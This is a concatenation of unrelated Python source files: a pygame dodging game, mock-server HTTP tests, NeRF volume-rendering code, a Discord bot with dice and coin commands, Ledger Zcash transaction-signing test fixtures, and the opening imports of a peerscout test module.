key_input = pygame.key.get_pressed()
if key_input[pygame.K_F3]:
if debug == False:
debug = True
print('debug=True')
else:
debug = False
print('debug=False')
screen.fill(LIGHTBLUE)
screen.blit(grassIMG,(0,size[1]-50))
#pygame.draw.rect(screen, RED, [55, 200, 100, 70],0)
#pygame.draw.line(screen, WHITE, [0, 0], [100, 100], 1)
#pygame.draw.ellipse(screen, BLACK, [20,20,250,100], 2)
#Wall collisions
if px <= 0:
px = 1
elif px+psize >= size[0]:
px = size[0]-1-psize
#movement and player func
if allow_movement:
px = move_with_arrows(px, pspeed)
player(px, size[1]-(psize*2), psize)
if debug:
pygame.draw.line(screen, RED, [px, size[1]-(psize*2)], [px+psize, size[1]-psize], 5)
#objects
Object(rx, ry, osize)
if debug:
pygame.draw.line(screen, BLUE, [rx, ry], [rx+osize, ry+osize], 5)
i+=1
updatepersec = 1
if allow_movement:
if i == updatepersec:
i=0
ry+=speed
#when hit ground
if ry >= size[1]-osize:
rx = randint(0, size[0]-osize)
ry = randint(osize, size[1]/3)
sur-=1
if sur == 0:
sur=speeduprate
speed+=1
if player_speed_increase:
pspeed+=1
#object vs player collisions
if object_player_collisions:
#if object has the same y level as player
if ry in range(size[1]-(psize*2), size[1]-psize) or ry+osize in range(size[1]-(psize*2), size[1]-psize):
#if object is touching player
if rx in range(int(px), int(px+psize)) or rx+osize in range(int(px), int(px+psize)):
allow_movement=False
collision=True
draw_text('GAME OVER', 'fonts\\Press_Start_2P\\PressStart2P-Regular.ttf', 50, BLACK, (size[0]/2)-220, (size[1]/2)-50)
draw_text('PRESS SPACE TO CONTINUE', 'fonts\\Press_Start_2P\\PressStart2P-Regular.ttf', 20, BLACK, (size[0]/2)-220, (size[1]/2))
keys = pygame.key.get_pressed() #checking pressed keys
if keys[pygame.K_SPACE]:
rx = randint(0, size[0]-osize)
ry = randint(osize, size[1]/3)
allow_movement=True
speed=default_speed
pspeed = default_pspeed
sur=speeduprate
i=0
collision=False
#debug screen
if debug:
Roboto = 'fonts\\Roboto\\Roboto-Regular.ttf'
fs = 15
draw_text('debug='+str(debug), Roboto, fs, WHITE, 10, 10)
draw_text('player=('+str(px)+', '+str(size[1]-(psize*2))+')', Roboto, fs, WHITE, 10, 25)
draw_text('object=('+str(rx)+', '+str(ry)+')', Roboto, fs, WHITE, 10, 40)
draw_text('player_speed='+str(pspeed), Roboto, fs, WHITE, 10, 55)
draw_text('object_speed='+str(speed), Roboto, fs, WHITE, 10, 70)
draw_text('collision='+str(collision), Roboto, fs, WHITE, 10, 85)
pygame.mouse.set_visible(False)
pygame.display.flip()
clock.tick(60)
pygame.quit()
|
# encoding=utf-8
import logging
import requests
from brunns.matchers.object import between
from brunns.matchers.response import is_response
from contexttimer import Timer
from hamcrest import assert_that
from mbtest.imposters import Imposter, Predicate, Response, Stub
logger = logging.getLogger(__name__)
def test_wait(mock_server):
imposter = Imposter(Stub(responses=Response(wait=100)))
with mock_server(imposter), Timer() as timer:
requests.get(imposter.url)
assert_that(timer.elapsed, between(0.1, 0.25))
def test_wait_function(mock_server):
imposter = Imposter(
Stub(responses=Response(wait="function() { return Math.floor(Math.random() * 50) + 100; }"))
)
with mock_server(imposter), Timer() as timer:
requests.get(imposter.url)
assert_that(timer.elapsed, between(0.1, 0.5))
def test_repeat(mock_server):
# Given
imposter = Imposter(
Stub(Predicate(), [Response(body="oranges", repeat=2), Response(body="apples")])
)
with mock_server(imposter) as s:
logger.debug("server: %s", s)
# When
r1 = requests.get(imposter.url)
r2 = requests.get(imposter.url)
r3 = requests.get(imposter.url)
# Then
assert_that(r1, is_response().with_body("oranges"))
assert_that(r2, is_response().with_body("oranges"))
assert_that(r3, is_response().with_body("apples"))
|
import pdb
import torch
from .nerf_helpers import get_minibatches, ndc_rays
from .nerf_helpers import sample_pdf_2 as sample_pdf
from .volume_rendering_utils import volume_render_radiance_field
local_chunksize=131072
def run_network(network_fn, pts, viewdirs, chunksize, embed_fn, embeddirs_fn, code=None):
pts_flat = pts.reshape((-1, pts.shape[-1]))
embedded = embed_fn(pts_flat)
if code is not None:
embedded = torch.cat([embedded, code[:,None].repeat(1,pts.shape[1], 1).view(-1,code.shape[-1])],1)
if embeddirs_fn is not None:
viewdirs = viewdirs[..., None, -3:]
input_dirs = viewdirs.expand(pts.shape)
input_dirs_flat = input_dirs.reshape((-1, input_dirs.shape[-1]))
embedded_dirs = embeddirs_fn(input_dirs_flat)
embedded = torch.cat((embedded, embedded_dirs), dim=-1)
batches = get_minibatches(embedded, chunksize=chunksize)
preds = [network_fn(batch) for batch in batches]
radiance_field = torch.cat(preds, dim=0)
radiance_field = radiance_field.reshape(
list(pts.shape[:-1]) + [radiance_field.shape[-1]]
)
return radiance_field
def predict_and_render_radiance(
ray_batch,
model_coarse,
model_fine,
mode="train",
encode_position_fn=None,
encode_direction_fn=None,
is_train=True,
radiance_field_noise_std=0.2,
):
# TESTED
num_rays = ray_batch.shape[0]
ro, rd = ray_batch[..., :3], ray_batch[..., 3:6]
bounds = ray_batch[..., 6:8].view((-1, 1, 2))
near, far = bounds[..., 0], bounds[..., 1]
# TODO: Use actual values for "near" and "far" (instead of 0. and 1.)
# when not enabling "ndc".
t_vals = torch.linspace(
0.0,
1.0,
64,
dtype=ro.dtype,
device=ro.device,
)
z_vals = near * (1.0 - t_vals) + far * t_vals
z_vals = z_vals.expand([num_rays, 64])
if is_train:
# noise
# Get intervals between samples.
mids = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])
upper = torch.cat((mids, z_vals[..., -1:]), dim=-1)
lower = torch.cat((z_vals[..., :1], mids), dim=-1)
# Stratified samples in those intervals.
t_rand = torch.rand(z_vals.shape, dtype=ro.dtype, device=ro.device)
z_vals = lower + (upper - lower) * t_rand
# pts -> (num_rays, N_samples, 3)
pts = ro[..., None, :] + rd[..., None, :] * z_vals[..., :, None]
radiance_field = run_network(
model_coarse,
pts,
ray_batch[..., -3:],
local_chunksize,
encode_position_fn,
encode_direction_fn,
)
(
rgb_coarse,
disp_coarse,
acc_coarse,
weights,
depth_coarse,
) = volume_render_radiance_field(
radiance_field,
z_vals,
rd/rd.norm(2,-1).unsqueeze(-1),
radiance_field_noise_std=radiance_field_noise_std,
white_background=False,
)
# fine pass
z_vals_mid = 0.5 * (z_vals[..., 1:] + z_vals[..., :-1])
z_samples = sample_pdf(
z_vals_mid,
weights[..., 1:-1],
64,
det=(not is_train),
)
z_samples = z_samples.detach()
z_vals, _ = torch.sort(torch.cat((z_vals, z_samples), dim=-1), dim=-1)
# pts -> (N_rays, N_samples + N_importance, 3)
pts = ro[..., None, :] + rd[..., None, :] * z_vals[..., :, None]
radiance_field = run_network(
model_fine,
pts,
ray_batch[..., -3:],
local_chunksize,
encode_position_fn,
encode_direction_fn,
)
rgb_fine, disp_fine, acc_fine, _, depth_fine = volume_render_radiance_field(
radiance_field,
z_vals,
rd/rd.norm(2,-1).unsqueeze(-1),
radiance_field_noise_std=radiance_field_noise_std,
white_background=False,
)
return rgb_coarse, disp_coarse, acc_coarse, rgb_fine, disp_fine, acc_fine, depth_coarse, depth_fine
def run_one_iter_of_nerf(
height,
width,
focal_length,
depth,
model_coarse,
model_fine,
ray_origins,
ray_directions,
mode="train",
encode_position_fn=None,
encode_direction_fn=None,
is_train=True,
radiance_field_noise_std=0.2,
):
# Provide ray directions as input
viewdirs = ray_directions
#viewdirs = viewdirs / viewdirs.norm(p=2, dim=-1).unsqueeze(-1)
viewdirs = viewdirs.reshape((-1, 3))
# Cache shapes now, for later restoration.
restore_shapes = [
ray_directions.shape,
ray_directions.shape[:-1],
ray_directions.shape[:-1],
]
if model_fine:
restore_shapes += restore_shapes
ro = ray_origins.reshape((-1, 3))
rd = ray_directions.reshape((-1, 3))
near = (depth-1).reshape(-1,1)
far = (depth+1).reshape(-1,1)
rays = torch.cat((ro, rd, near, far), dim=-1)
rays = torch.cat((rays, viewdirs), dim=-1)
batches = get_minibatches(rays, chunksize=local_chunksize)
pred = [
predict_and_render_radiance(
batch,
model_coarse,
model_fine,
encode_position_fn=encode_position_fn,
encode_direction_fn=encode_direction_fn,
is_train=is_train,
radiance_field_noise_std=radiance_field_noise_std,
)
for batch in batches
]
synthesized_images = list(zip(*pred))
synthesized_images = [
torch.cat(image, dim=0) if image[0] is not None else (None)
for image in synthesized_images
]
if mode == "validation":
synthesized_images = [
image.view(shape) if image is not None else None
for (image, shape) in zip(synthesized_images, restore_shapes)
]
# Returns rgb_coarse, disp_coarse, acc_coarse, rgb_fine, disp_fine, acc_fine
# (assuming both the coarse and fine networks are used).
if model_fine:
return tuple(synthesized_images)
else:
# If the fine network is not used, rgb_fine, disp_fine, acc_fine are
# set to None.
return tuple(synthesized_images + [None, None, None])
return tuple(synthesized_images)
|
import random
from dbots.cmd import *
from util import *
from .transform import NUMBERS
class FunModule(Module):
@Module.command(extends=dict(
count="The count of dice to roll",
private="Whether the result should be shown to everyone"
))
async def roll(self, ctx, count: int = 1, public: bool = True):
"""
Role one or multiple dice
"""
count = min(max(count, 1), 50)
if count > 1:
result = {}
for i in range(count):
value = random.randint(1, 6)
if value in result:
result[value] += 1
else:
result[value] = 1
total = sum([k * v for k, v in result.items()])
result_text = "\n".join([
f"**{NUMBERS[r].title()}** was rolled **{result[r]}** time(s)."
for r in sorted(result)
])
text = f":game_die: **I rolled {count} dice**:\n" \
f"{result_text}\n" \
f"The total is: **{total}**."
else:
value = random.randrange(1, 6)
text = f":game_die: I rolled a die and the result is **{NUMBERS[value].title()}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
public="Whether the result should be shown to everyone"
))
async def choose(self, ctx, option_a, option_b, option_c=None, option_d=None, option_e=None, public: bool = True):
"""
Randomly choose between two or more options
"""
options = list(filter(lambda o: o is not None, [option_a, option_b, option_c, option_d, option_e]))
result = random.choice(options)
option_text = " and ".join(", ".join([f"**{o}**" for o in options]).rsplit(", ", 1))
text = f"I chose between {option_text} and my choice is: **{result}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
public="Whether the result should be shown to everyone"
))
async def coin(self, ctx, public: bool = True):
"""
Flip a coin
"""
result = random.choice(["Heads", "Tails"])
text = f":coin: I flipped a coin and it landed on: **{result}**!"
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command(extends=dict(
min="The minimum number",
max="The maximum number",
public="Whether the result should be shown to everyone"
))
async def random(self, ctx, min: int = 0, max: int = 100, public: bool = True):
"""
Get a random number between min and max
"""
result = random.randint(min, max)
text = f"I chose a number between **{min}** and **{max}** and my choice is: **{result}**."
if public:
await send_webhook_response(ctx, text)
else:
await ctx.respond(text, ephemeral=True)
@Module.command()
async def monox(self, ctx, message=""):
"""
monox
"""
await send_webhook_response(ctx, f"{message} <a:monoxpat:797866087000702986>")
|
import pytest
from dataclasses import dataclass, field
from functools import reduce
from typing import List, Optional
from helpers.basetest import BaseTestBtc, LedgerjsApdu, TxData, CONSENSUS_BRANCH_ID
from helpers.deviceappbtc import DeviceAppBtc, CommException
# Test data below is from a Zcash test log from Live team"
test_zcash_prefix_cmds = [
LedgerjsApdu( # Get version
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102" # i.e. "Zcash" + "1.3.23" (not checked)
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000000", # GET PUBLIC KEY - on 44'/133'/0'/0/0 path
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543" # "Zcash" + "ZEC"
),
LedgerjsApdu(
commands=[
"e040000009028000002c80000085", # Get Public Key - on path 44'/133'
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=[
"e040000009028000002c80000085", # path 44'/133'
"e04000000d038000002c8000008580000000", # path 44'/133'/0'
"e04000000d038000002c8000008580000001", # path 44'/133'/1'
"b001000000"
],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004", # Get Public Key - on path 44'/133'/0'/0/4
"e016000000", # Coin info
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004", # Get Public Key - on path 44'/133'/0'/0/4
"e016000000"
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
)
]
test_zcash_tx_sign_gti = [
LedgerjsApdu( # GET TRUSTED INPUT
commands=[
"e042000009000000010400008001",
"e042800025edc69b8179fd7c6a11a8a1ba5d17017df5e09296c3a1acdada0d94e199f68857010000006b",
"e042800032483045022100e8043cd498714122a78b6ecbf8ced1f74d1c65093c5e2649336dfa248aea9ccf022023b13e57595635452130",
"e0428000321c91ed0fe7072d295aa232215e74e50d01a73b005dac01210201e1c9d8186c093d116ec619b7dad2b7ff0e7dd16f42d458da",
"e04280000b1100831dc4ff72ffffff00",
"e04280000102",
"e042800022a0860100000000001976a914fa9737ab9964860ca0c3e9ad6c7eb3bc9c8f6fb588ac",
"e0428000224d949100000000001976a914b714c60805804d86eb72a38c65ba8370582d09e888ac",
"e04280000400000000",
],
expected_resp="3200" + "--"*2 + "20b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51010000004d94910000000000" + "--"*8
),
]
test_zcash_tx_to_sign_abandonned = [
LedgerjsApdu( # GET PUBLIC KEY
commands=["e040000015058000002c80000085800000000000000100000001"], # on 44'/133'/0'/1/1
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT START
commands=[
"e0440005090400008085202f8901",
"e04480053b013832004d0420b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51010000004d9491000000000045e1e144cb88d4d800",
"e044800504ffffff00",
]
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL
commands=[
"e04aff0015058000002c80000085800000000000000100000003",
# "e04a0000320240420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac39498200000000001976a91425ea06"
"e04a0000230140420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
], # tx aborted on 2nd command
expected_sw="6985"
),
]
test_zcash_tx_sign_restart_prefix_cmds = [
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
),
LedgerjsApdu(
commands=[
"e040000015058000002c80000085800000000000000000000004",
"e016000000",
],
expected_resp="1cb81cbd01055a63617368035a4543"
),
LedgerjsApdu(
commands=["b001000000"],
# expected_resp="01055a63617368--------------0102"
)
]
test_zcash_tx_to_sign_finalized = test_zcash_tx_sign_gti + [
LedgerjsApdu( # GET PUBLIC KEY
commands=["e040000015058000002c80000085800000000000000100000001"], # on 44'/133'/0'/1/1
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT START
commands=[
"e0440005090400008085202f8901",
"e04480053b""013832004d""0420b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51""01000000""4d94910000000000""45e1e144cb88d4d8""00",
"e044800504ffffff00",
]
),
LedgerjsApdu( # UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL
commands=[
"e04aff0015058000002c80000085800000000000000100000003",
# "e04a0000320240420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac39498200000000001976a91425ea06"
"e04a0000230140420f00000000001976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
"e04a8000045eb3f840"
],
expected_resp="0000"
),
LedgerjsApdu(
commands=[
"e044008509""0400008085202f8901",
"e04480853b""013832004d04""20b7c68231303b2425a91b12f05bd6935072e9901137ae30222ef6d60849fc51""01000000""4d94910000000000""45e1e144cb88d4d8""19",
"e04480851d""76a9140a146582553b2f5537e13cef6659e82ed8f69b8f88ac""ffffff00",
"e048000015""058000002c80000085800000000000000100000001"
],
check_sig_format=True
)
]
ledgerjs_test_data = [
test_zcash_prefix_cmds, test_zcash_tx_sign_gti, test_zcash_tx_to_sign_abandonned,
test_zcash_tx_sign_restart_prefix_cmds, test_zcash_tx_to_sign_finalized
]
utxo_single = bytes.fromhex(
# https://sochain.com/api/v2/tx/ZEC/ec9033381c1cc53ada837ef9981c03ead1c7c41700ff3a954389cfaddc949256
# Version @offset 0
"04000080"
# versionGroupId @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input prevout hash @offset 9
"53685b8809efc50dd7d5cb0906b307a1b8aa5157baa5fc1bd6fe2d0344dd193a"
# Input prevout idx @offset 41
"00000000"
# Input script length @offset 45
"6b"
# Input script (107 bytes) @ offset 46
"483045022100ca0be9f37a4975432a52bb65b25e483f6f93d577955290bb7fb0"
"060a93bfc92002203e0627dff004d3c72a957dc9f8e4e0e696e69d125e4d8e27"
"5d119001924d3b48012103b243171fae5516d1dc15f9178cfcc5fdc67b0a8830"
"55c117b01ba8af29b953f6"
# Input sequence @offset 151
"ffffffff"
# Output count @offset 155
"01"
# Output #1 value @offset 156
"4072070000000000"
# Output #1 script length @offset 164
"19"
# Output #1 script (25 bytes) @offset 165
"76a91449964a736f3713d64283fd0018626ba50091c7e988ac"
# Locktime @offset 190
"00000000"
# Extra payload (size of everything remaining, specific to btc app inner protocol @offset 194
"0F"
# Expiry @offset 195
"00000000"
# valueBalance @offset 199
"0000000000000000"
# vShieldedSpend @offset 207
"00"
# vShieldedOutput @offset 208
"00"
# vJoinSplit @offset 209
"00"
)
utxos = [
# Considered a segwit tx - segwit flags couldn't be extracted from raw
# Get Trusted Input APDUs as they are not supposed to be sent w/ these APDUs.
bytes.fromhex(
# Version @offset 0
"04000080"
# versionGroupId @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input prevout hash @offset 9
"edc69b8179fd7c6a11a8a1ba5d17017df5e09296c3a1acdada0d94e199f68857"
# Input prevout idx @offset 41
"01000000"
# Input script length @offset 45
"6b"
# Input script (107 bytes) @ offset 46
"483045022100e8043cd498714122a78b6ecbf8ced1f74d1c65093c5e2649336d"
"fa248aea9ccf022023b13e575956354521301c91ed0fe7072d295aa232215e74"
"e50d01a73b005dac01210201e1c9d8186c093d116ec619b7dad2b7ff0e7dd16f"
"42d458da1100831dc4ff72"
# Input sequence @offset 153
"ffffff00"
# Output count @offset 157
"02"
# Output #1 value @offset 160
"a086010000000000"
# Output #1 script length @offset 168
"19"
# Output #1 script (25 bytes) @offset 167
"76a914fa9737ab9964860ca0c3e9ad6c7eb3bc9c8f6fb588ac"
# Output #2 value @offset 192
"4d94910000000000" # 9 540 685 units of ZEC smallest currency available
# Output #2 script length @offset 200
"19"
# Output #2 script (25 bytes) @offset 201
"76a914b714c60805804d86eb72a38c65ba8370582d09e888ac"
# Locktime @offset 226
"00000000"
# Extra payload (size of everything remaining, specific to btc app inner protocol @offset 230
"0F"
# Expiry @offset 231
"00000000"
# valueBalance @offset 235
"0000000000000000"
# vShieldedSpend @offset 243
"00"
# vShieldedOutput @offset 244
"00"
# vJoinSplit @offset 245
"00"
)
]
tx_to_sign = bytes.fromhex(
# version @offset 0
"04000080"
# Some Zcash flags (?) @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input's prevout hash @offset 9
"d35f0793da27a5eacfe984c73b1907af4b50f3aa3794ba1bb555b9233addf33f"
# Prevout idx @offset 41
"01000000"
# input sequence @offset 45
"ffffff00"
# Output count @offset 49
"02"
# Output #1 value @offset 50
"40420f0000000000" # 1 000 000 units of available balance spent
# Output #1 script (26 bytes) @offset 58
"1976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
# Output #2 value @offset 84
"2b51820000000000"
# Output #2 scritp (26 bytes) @offset 92
"1976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
# Locktime @offset 118
"5eb3f840"
)
change_path = bytes.fromhex("058000002c80000085800000000000000100000003") # 44'/133'/0'/1/3
output_paths = [
bytes.fromhex("058000002c80000085800000000000000100000001"), # 44'/133'/0'/1/1
bytes.fromhex("058000002c80000085800000000000000000000004") # 44'/133'/0'/0/4
]
@pytest.mark.zcash
class TestLedgerjsZcashTx(BaseTestBtc):
def _send_raw_apdus(self, apdus: List[LedgerjsApdu], device: DeviceAppBtc):
# Send the Get Version APDUs
for apdu in apdus:
try:
for command in apdu.commands:
response = device.sendRawApdu(bytes.fromhex(command))
if apdu.expected_resp is not None:
self.check_raw_apdu_resp(apdu.expected_resp, response)
elif apdu.check_sig_format is not None and apdu.check_sig_format == True:
self.check_signature(response) # Only format is checked
except CommException as error:
if apdu.expected_sw is not None and error.sw.hex() == apdu.expected_sw:
continue
raise error
@pytest.mark.skip(reason="Hardcoded TrustedInput can't be replayed on a different device than the one that generated it")
@pytest.mark.manual
@pytest.mark.parametrize('test_data', ledgerjs_test_data)
def test_replay_zcash_test(self, test_data: List[LedgerjsApdu]) -> None:
"""
Replay of raw apdus from @gre.
First time an output is presented for validation, it must be rejected by user
Then tx will be restarted and on 2nd presentation of outputs they have to be
accepted.
"""
apdus = test_data
btc = DeviceAppBtc()
self._send_raw_apdus(apdus, btc)
@pytest.mark.manual
def test_get_single_trusted_input(self) -> None:
btc = DeviceAppBtc()
# 1. Get Trusted Input
print("\n--* Get Trusted Input - from utxos")
input_datum = bytes.fromhex("00000000") + utxo_single
utxo_chunk_len = [
4 + 5 + 4, # len(prevout_index (BE)||version||input_count||versionGroupId)
37, # len(prevout_hash||prevout_index||len(scriptSig))
-1, # len(scriptSig, from last byte of previous chunk) + len(input_sequence)
1, # len(output_count)
34, # len(output_value #1||len(scriptPubkey #1)||scriptPubkey #1)
4 + 1, # len(locktime || extra_data)
4+16+1+1+1 # len(Expiry||valueBalance||vShieldedSpend||vShieldedOutput||vJoinSplit)
]
trusted_input = btc.getTrustedInput(data=input_datum, chunks_len=utxo_chunk_len)
self.check_trusted_input(
trusted_input,
out_index=bytes.fromhex("00000000"),
out_amount=bytes.fromhex("4072070000000000"),
out_hash=bytes.fromhex("569294dcadcf8943953aff0017c4c7d1ea031c98f97e83da3ac51c1c383390ec")
)
print(" OK")
@pytest.mark.manual
def test_replay_zcash_test2(self) -> None:
"""
Adapted version to work around some hw limitations
"""
# Send the Get Version raw apdus
apdus = test_zcash_prefix_cmds
btc = DeviceAppBtc()
self._send_raw_apdus(apdus, btc)
# 1. Get Trusted Input
print("\n--* Get Trusted Input - from utxos")
output_indexes = [
tx_to_sign[41+4-1:41-1:-1], # out_index in tx_to_sign input must be passed BE as prefix to utxo tx
]
input_data = [out_idx + utxo for out_idx, utxo in zip(output_indexes, utxos)]
utxos_chunks_len = [
[ # utxo #1
4+5+4, # len(prevout_index (BE)||version||input_count||versionGroupId)
37, # len(prevout_hash||prevout_index||len(scriptSig))
-1, # len(scriptSig, from last byte of previous chunk) + len(input_sequence)
1, # len(output_count)
34, # len(output_value #1||len(scriptPubkey #1)||scriptPubkey #1)
34, # len(output_value #2||len(scriptPubkey #2)||scriptPubkey #2)
4 + 1, # len(locktime)
4 + 16 + 1 + 1 + 1 # len(Expiry||valueBalance||vShieldedSpend||vShieldedOutput||vJoinSplit)
]
]
trusted_inputs = [
btc.getTrustedInput(
data=input_datum,
chunks_len=chunks_len
)
for (input_datum, chunks_len) in zip(input_data, utxos_chunks_len)
]
print(" OK")
out_amounts = [utxos[0][192:192+8]] # UTXO tx's 2nd output's value
prevout_hashes = [tx_to_sign[9:9+32]]
for trusted_input, out_idx, out_amount, prevout_hash in zip(
trusted_inputs, output_indexes, out_amounts, prevout_hashes
):
self.check_trusted_input(
trusted_input,
out_index=out_idx[::-1], # LE for comparison w/ out_idx in trusted_input
out_amount=out_amount, # utxo output #1 is requested in tx to sign input
out_hash=prevout_hash # prevout hash in tx to sign
)
# 2.0 Get public keys for output paths & compute their hashes
print("\n--* Get Wallet Public Key - for each tx output path")
wpk_responses = [btc.getWalletPublicKey(output_path) for output_path in output_paths]
print(" OK")
pubkeys_data = [self.split_pubkey_data(data) for data in wpk_responses]
for pubkey in pubkeys_data:
print(pubkey)
# 2.1 Construct a pseudo-tx without input script, to be hashed 1st.
print("\n--* Untrusted Transaction Input Hash Start - Hash tx to sign first w/ all inputs having a null script length")
input_sequences = [tx_to_sign[45:45+4]]
ptx_to_hash_part1 = [tx_to_sign[:9]]
for trusted_input, input_sequence in zip(trusted_inputs, input_sequences):
ptx_to_hash_part1.extend([
bytes.fromhex("01"), # TrustedInput marker byte, triggers the TrustedInput's HMAC verification
bytes([len(trusted_input)]),
trusted_input,
bytes.fromhex("00"), # Input script length = 0 (no sigScript)
input_sequence
])
ptx_to_hash_part1 = reduce(lambda x, y: x+y, ptx_to_hash_part1) # Get a single bytes object
ptx_to_hash_part1_chunks_len = [
9 # len(version||flags||input_count) - skip segwit version+flag bytes
]
for trusted_input in trusted_inputs:
ptx_to_hash_part1_chunks_len.extend([
1 + 1 + len(trusted_input) + 1, # len(trusted_input_marker||len(trusted_input)||trusted_input||len(scriptSig) == 0)
4 # len(input_sequence)
])
btc.untrustedTxInputHashStart(
p1="00",
p2="05", # Value used for Zcash
data=ptx_to_hash_part1,
chunks_len=ptx_to_hash_part1_chunks_len
)
print(" OK")
# 2.2 Finalize the input-centric-, pseudo-tx hash with the remainder of that tx
# 2.2.1 Start with change address path
print("\n--* Untrusted Transaction Input Hash Finalize Full - Handle change address")
ptx_to_hash_part2 = change_path
ptx_to_hash_part2_chunks_len = [len(ptx_to_hash_part2)]
btc.untrustedTxInputHashFinalize(
p1="ff", # to derive BIP 32 change address
data=ptx_to_hash_part2,
chunks_len=ptx_to_hash_part2_chunks_len
)
print(" OK")
# 2.2.2 Continue w/ tx to sign outputs & scripts
print("\n--* Untrusted Transaction Input Hash Finalize Full - Continue w/ hash of tx output")
ptx_to_hash_part3 = tx_to_sign[49:118] # output_count||repeated(output_amount||scriptPubkey)
ptx_to_hash_part3_chunks_len = [len(ptx_to_hash_part3)]
response = btc.untrustedTxInputHashFinalize(
p1="00",
data=ptx_to_hash_part3,
chunks_len=ptx_to_hash_part3_chunks_len
)
assert response == bytes.fromhex("0000")
print(" OK")
# We're done w/ the hashing of the pseudo-tx with all inputs w/o scriptSig.
# 2.2.3. Zcash-specific: "When using Overwinter/Sapling, UNTRUSTED HASH SIGN is
# called with an empty authorization and nExpiryHeight following the first
# UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL"
print("\n--* Untrusted Has Sign - with empty Auth & nExpiryHeight")
branch_id_data = [
bytes.fromhex(
"00" # Number of derivations (None)
"00" # Empty validation code
),
tx_to_sign[-4:], # locktime
bytes.fromhex("01"), # SigHashType - always 01
bytes.fromhex("00000000") # Empty nExpiryHeight
]
response = btc.untrustedHashSign(
data = reduce(lambda x, y: x+y, branch_id_data)
)
# 3. Sign each input individually. Because inputs are segwit, hash each input with its scriptSig
# and sequence individually, each in a pseudo-tx w/o output_count, outputs nor locktime.
print("\n--* Untrusted Transaction Input Hash Start, step 2 - Hash again each input individually (only 1)")
# Inputs are P2WPKH, so use 0x1976a914{20-byte-pubkey-hash}88ac from utxo as scriptSig in this step.
#
# From btc.asc: "The input scripts shall be prepared by the host for the transaction signing process as
# per bitcoin rules : the current input script being signed shall be the previous output script (or the
# redeeming script when consuming a P2SH output, or the scriptCode when consuming a BIP 143 output), and
# other input script shall be null."
input_scripts = [utxos[0][196:196 + utxos[0][196] + 1]]
# input_scripts = [tx_to_sign[45:45 + tx_to_sign[45] + 1]]
# input_scripts = [bytes.fromhex("1976a914") + pubkey.pubkey_hash + bytes.fromhex("88ac")
# for pubkey in pubkeys_data]
ptx_for_inputs = [
[ tx_to_sign[:8], # Tx version||zcash flags
bytes.fromhex("0101"), # Input_count||TrustedInput marker byte
bytes([len(trusted_input)]),
trusted_input,
input_script,
input_sequence
] for trusted_input, input_script, input_sequence in zip(trusted_inputs, input_scripts, input_sequences)
]
ptx_chunks_lengths = [
[
9, # len(version||zcash flags||input_count) - segwit flag+version not sent
1 + 1 + len(trusted_input) + 1, # len(trusted_input_marker||len(trusted_input)||trusted_input||scriptSig_len == 0x19)
-1 # get len(scripSig) from last byte of previous chunk + len(input_sequence)
] for trusted_input in trusted_inputs
]
# Hash & sign each input individually
for ptx_for_input, ptx_chunks_len, output_path in zip(ptx_for_inputs, ptx_chunks_lengths, output_paths):
# 3.1 Send pseudo-tx w/ sigScript
btc.untrustedTxInputHashStart(
p1="00",
p2="80", # to continue previously started tx hash, be it BTc or other BTC-like coin
data=reduce(lambda x,y: x+y, ptx_for_input),
chunks_len=ptx_chunks_len
)
print(" Final hash OK")
# 3.2 Sign tx at last. Param is:
# Num_derivs||Dest output path||RFU (0x00)||tx locktime||sigHashType(always 0x01)||Branch_id for overwinter (4B)
print("\n--* Untrusted Transaction Hash Sign")
tx_to_sign_data = output_path \
+ bytes.fromhex("00") \
+ tx_to_sign[-4:] \
+ bytes.fromhex("01") \
+ bytes.fromhex("00000000")
response = btc.untrustedHashSign(
data = tx_to_sign_data
)
self.check_signature(response) # Check sig format only
# self.check_signature(response, expected_der_sig) # Can't test sig value as it depends on signing device seed
print(" Signature OK\n")
|
import logging
import json
from typing import Dict
from unittest.mock import patch, Mock, ANY
from configparser import ConfigParser
from datetime import datetime, timedelta
import pytest
from peerscout.utils.config import dict_to_config
from peerscout.shared.database import populated_in_memory_database
from peerscout.preprocessing import enrichData as enrich_data_module
from peerscout.preprocessing.enrichData import (
extract_manuscript,
contains_author_with_orcid,
create_str_cache,
enrich_and_update_person_list,
get_crossref_works_by_orcid_url,
get_crossref_works_by_full_name_url,
parse_int_list,
decorate_get_request_handler,
get_persons_to_enrich,
main,
